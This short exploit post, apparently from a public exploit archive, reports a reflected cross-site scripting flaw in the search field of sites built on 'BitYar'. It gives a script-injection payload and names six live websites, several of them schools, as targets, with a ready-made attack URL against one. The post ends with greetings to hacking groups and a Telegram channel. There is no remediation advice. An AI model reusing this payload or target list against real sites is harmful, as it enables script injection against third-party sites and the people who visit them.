##########################
# Exploit Title: BitYar Cross Site Scripting
# Date: 2017-10-28
# Discovered By: ArashHC
# Tested on : Win10, Win8, Kali Linux
##########################
Vulnerability is the site search field
Some Targets:
http://khademyaran.ir
http://ershadschool.com/
http://shahedschool.com/
http://ers2.ershadschool.com/
http://ers1.ershadschool.com/
http://ers.ershadschool.com/
Exploit:
/?s="<script>alert("Hacked+By+ArashHC")<%2Fscript>
Example:
http://ers.ershadschool.com/?s="<script>alert("Hacked+By+ArashHC")<%2Fscript>
##########################
# Thanks to : EreBus, RexProg, Crazy_Boy, AVENGER, ViRuS007, BlackWolfIran, LM7RIX, AliCyber, </ZED>, Agent W, AnonyCoder, Sarbaz Vatan, unknown0707, FarsProg
# https://t.me/CyberSoldiersST
# Discovered By: ArashHC